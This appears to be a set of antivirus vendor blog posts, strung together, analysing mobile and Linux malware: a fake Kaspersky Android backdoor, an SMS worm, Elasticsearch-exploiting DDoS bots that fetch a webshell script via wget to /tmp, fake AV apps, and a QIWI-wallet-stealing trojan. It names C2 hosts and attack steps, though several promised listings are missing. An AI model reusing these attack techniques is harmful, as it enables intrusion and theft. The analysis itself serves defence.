This week, our virus lab handled a case where a customer received a phishing email with an Android Backdoor archive masquerading as a Kaspersky mobile security app (we are aware that those who created this app are also disguising it as apps from other major AV brands).
It prompts recipients to install the fake Kaspersky Android app to protect their mobile security. From the context we can presume the intended targets are users in Poland.
Most email phishing attacks tend to target PC users, but this time the attackers have turned their attention to mobile platforms. We think it's a new trend in spreading virus. Mobile security is related to user privacy. In most cases, a mobile device is more important than PC for users. It contains user contacts, text messages, photos and call logs. And mobile security is generally considered to be a weak point. So, most people will believe these phishing emails and are likely to install the fake mobile security app.
In this case, the Android apk in the phishing email is a powerful and aggressive backdoor which is detected as Backdoor.AndroidOS.Zerat.a. The backdoor is full of malicious functions, but the GUI is a little simple and crude.
Maybe it only wants you to install it and click the button. By executing, it links to hxxp://winrar.nstrefa.pl/path/DeviceManager.php to register the victim device info.
Then it visits hxxp://winrar.nstrefa.pl/path/Linker.php to get commands.
According to the commands, it will perform lots of malicious activities.
Some of the commands are shown below.
Intercepting text messages:
Store and upload:
This is a new type of mobile security threat that works just like a phishing site or phishing SMS. With the phishing email, the backdoor will spread more easily. There is reason to believe that more increasingly complex mobile attacks with follow. Composite attacks on mobile platforms are simply a matter of time.
In this day and age it is very important to protect our privacy and device security. It's recommended to follow these tips:
On August 2, the Chinese Valentine's Day, an Android SMS worm struck China. It is called XXshenqi.apk. In the space of six hours, it infected about 500,000 devices. It has received widespread coverage in the local media. It's not just an SMS worm, containing two malicious modules: XXshenqi.apk and its asset Trogoogle.apk.
The function of XXshenqi.apk is to send SMS to spread itself and to drop another backdoor on the victim device. It is detected as Trojan.AndroidOS.Xshqi.a by Kaspersky Lab.
After installation, it sends an SMS to all the names on the victim's contact lists to get them to install the Trojan as well.
Then it probes whether or not com.android.Trogoogle.apk is present on the mobile device. If not, it displays a dialog window to prompt the user to install Trogoogle.apk.
Trogoogle.apk is a resource file in the assets folder of XXshenqi.apk.
After that, it asks the user to register the app. The Trojan will steal the user's personal ID and name and send them to those controlling the malware.
Trogoogle.apk contains more malicious functions. It is a backdoor and detected as Backdoor.AndroidOS.Trogle.a by Kaspersky Lab. It hides its icon after installation so the user is unaware of its presence. It will then respond to commands to perform malicious activity. The commands include:
It also monitors the victim's text messages and sends them to the malware owner by email or SMS.
The fact that this Trojan combintion appeared on the Chinese Valentine's Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as much as possible and infect more devices. This Trojan is a good example of why it's always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.
A couple weeks ago, my colleague Mikhail K posted on the "versatile linux DDoS trojan", with analysis of several bots, including a bot implementing some extraordinary DNS amplification DDoS functionality. Operators of these bots are currently active, and we observe new variants of the trojan building bigger botnets.
Let's explore some additional offensive details of this crew's activity, and details of the overall situation, in the past week. In general, the DDoS trojans are being distributed to fire on victim profiles that seem to indicate purely cybercrime activity. The compromised hosts used to run the bots we observed have been running Amazon EC2 instances, but of course, this platform is not the only one being attacked and mis-used. It's also interesting that operators of this botnet apparently have no problem working with CN sites, as demonstrated by their use of the site hosting their tools since late 2013. Seven of their eight tools hosted here were uploaded in the past couple of weeks, coinciding with their updated attack activity. Their repository includes recent (cve-2014-0196) and older (cve-2012-0056) Linux escalation of privilege exploit source code, likely compiled on the compromised hosts only when higher privileges are necessary, along with compiled offensive sql tools (Backdoor.Linux.Ganiw.a), multiple webshell (Backdoor.Perl.RShell.c and Backdoor.Java.JSP.k) and two new variants of the "versatile bots" (Backdoor.Linux.Mayday.g), the udp-only "xudp" code being the newer of the two:
But first, how are they getting in to EC2 instances and running their linux DDoS bots from the cloud? They are actively exploiting a known, recent elasticsearch vulnerability in all versions 1.1.x (cve-2014-3120), which happens to still be in active commercial deployment for some organizations. If you are still running 1.1.x, upgrade to the latest 1.2 or 1.3 release, which was released a couple of days ago. Dynamic scripting is disabled by default, and other features added to help ease the migration. From a couple of incidents on Amazon EC2 customers whose instances were compromised by these attackers, we were able to capture very early stages of the attacks. The attackers re-purpose known cve-2014-3120 proof-of-concept exploit code to deliver a perl webshell that Kaspersky products detect as Backdoor.Perl.RShell.c. Linux admins can scan for these malicious components with our server product.
Gaining this foothold presents the attacker with bash shell access on the server. The script "pack.pl" is fetched with wget and saved from the web host above to /tmp/zerl and run from there, providing the bash shell access to the attacker. Events in your index logs may suggest your server has fallen to this attack:
Hosted on the same remote server and fetched via the perl webshell are the DDoS bots maintaining new encrypted c2 strings, detected as Backdoor.Linux.Mayday.g. One of the variants includes the DNS amplification functionality described in Mikhail's previous post. But the one in use on compromised EC2 instances oddly enough were flooding sites with UDP traffic only. The flow is strong enough that the DDoS'd victims were forced to move from their normal hosting operations ip addresses to those of an anti-DDoS solution. The flow is also strong enough that Amazon is now notifying their customers, probably because of potential for unexpected accumulation of excessive resource charges for their customers. The situation is probably similar at other cloud providers. The list of the DDoS victims include a large regional US bank and a large electronics maker and service provider in Japan, indicating the perpetrators are likely your standard financially driven cybercrime ilk.
Experts recently discovered a scam antivirus app on Google Play going by the name of Virus Shield. A distinct feature of this particular app was the fact that users had to pay for it - most fake AV can initially be downloaded for free. This meant its creators immediately started making money and didn't have to demand payments from users to remove "malware" that had supposedly been detected on their computers. To avoid negative reviews on Google Play all that was required was to make it look like the app was doing something useful.
Virus Shield was followed by a series of other similar fake apps. Early last week, for instance, we detected two rather interesting fake antivirus programs.
The first fake app was discovered on Windows Phone Store, which in itself was unusual - scammers tend to use Google Play. This app, which also had to be paid for up front, went by the name of Kaspersky Mobile. The fact that there is no program with that name in Kaspersky Lab's product line didn't deter the fraudsters - they obviously didn't expect anyone to notice.
This fake app pretends to carry out some useful activity such as "scanning" files. But look closely at the screenshot and you will see that as well as showing "scan progress" it is supposedly performing a "heuristic analysis". As a rule, antivirus solutions don't display a separate progress bar for a heuristic analysis.
However, the scammers seem to show a bit more knowledge about software developers and their name-dropping wasn't limited to Kaspersky Lab. The fake AV creators uploaded numerous other types of paid apps to Windows Phone Store that used the names and logos of several popular programs.
They include Google Chrome for 99 rubles (approx. $2.80), and Google Chrome Pro, which for some reason cost just 59 rubles. There are some "antivirus" applications from unknown developers, but upon closer inspection the only difference between them and Kaspersky Mobile turned out to be the logo and the colors used in the interface.
But most interesting of all was Virus Shield at 69 rubles (approx. $2) - the same fake AV we mentioned above - which was discovered on Google Play.
This is a good example of how one successful scam spawns numerous clones. Instead of just one fake AV, the scammers offer dozens of fake apps, copying the design, but not the functionality of the original.
The second fake app of note that we discovered was for sale on Google Play and was called Kaspersky Anti-Virus 2014. Just to clarify, there is no Kaspersky Lab mobile product by that name. The screenshot used on the page of the fake app was simply copied from the official Kaspersky Internet Security for Android page.
The fake app does absolutely nothing to protect the user's device - the creators didn't even bother to add a simulation of a scanner. Instead of a security solution the buyer gets nothing more than a fake app whose functionality is limited to random statements along the lines of a Magic 8-Ball set against a background of the Kaspersky Anti-Virus logo. Kaspersky Lab products detect the app as Trojan-FakeAV.AndroidOS.Wkas.a.
It is quite possible that more and more of these fake apps will start appearing. One thing is for sure - the mechanisms put in place by the official stores are clearly unable to combat scams like this.
P.S. Either there weren't too many takers for the fake Kaspersky Internet Security for Android, or greed got the better of the creators - in any case, they decided to up the ante. Apart from an "antivirus" app for 142 rubles, we discovered another app on the scammers' Google Play page that was on sale for 3556 rubles (approx. $100).
The screenshots for this expensive program bearing the name 'i am rich' were reminiscent of those used in an app for iOS with the same name whose functionality consisted entirely of displaying an image of a ruby and a caption saying "I am rich". We decided not to pay the $100 asking price for the app, but we're sure that its functionality is not much different from its earlier namesake or any of the other fake apps from the scammers in question.
We've written several times about mobile malware that can send text messages to premium numbers or steal money from online bank accounts. We also know that cybercriminals are constantly looking for new ways of stealing money using mobile Trojans. So our recent discovery of Trojan-SMS.AndroidOS.Waller.a highlighted a new get-rich technique that not only sent a premium SMS but also saw the malware attempt to steal money from a QIWI electronic wallet.
After Trojan-SMS.AndroidOS.Waller.a launches, it contacts its C&C server and awaits further commands.
The cybercriminals' C&C server is located at playerhome.info. The domain is registered by a French company and the registration data gives a French telephone number, but the email is an account with the Russian company Yandex. The Cloudflare cloud service is used to host the domain.
After receiving the relevant commands, Trojan-SMS.AndroidOS.Waller.a can:
However, as well as the standard Trojan-SMS functions, Waller possesses several other features that mean it can steal from QIWI-Wallets belonging to the owners of infected smartphones. After receiving the relevant command, the Trojan checks the balance of the QIWI electronic wallet. It does this by sending an SMS request to the number 7494. The message sent in response is intercepted by the Trojan and forwarded to its owners.
If the owner of an infected smartphone has a QIWI account and Waller receives information that there is money in the e-wallet, then the Trojan can transfer the money from the user's account to the QIWI account of the cybercriminals. To do this a command is given to the Trojan to send an SMS to the number 7494 that includes the wallet number of the criminals and the sum to be transferred. Up to 15,000 rubles (approximately $430) can be transferred per day.
Below is a sample answer from a C&C server with commands to check the balance of a phone account, the balance of a QIWI Wallet and to delete incoming text messages from the premium numbers 1141, 1151, 1899, and 1161:
Using electronic wallets makes it possible for cybercriminals to steal money from people in countries where premium-rate numbers don't work. Electronic wallets that can be managed via SMS are available in lots of countries. According to Wikipedia, the QIWI service is on the market in seven other countries apart from Russia (Romania, Brazil, Kazakhstan, Belarus, Moldova, Jordan and the USA) and there are franchises in 15 other countries.
The Trojan spreads from the cybercriminal sites in the guise of applications such as "universal android firmware", "media player classic for android", "change your voice on android". Waller also spreads via SMS spam. The Trojan is still not very widespread, but cybercriminals are increasingly using it to try and infect mobile devices.
To reduce the risk of infection by mobile malware we recommend that users: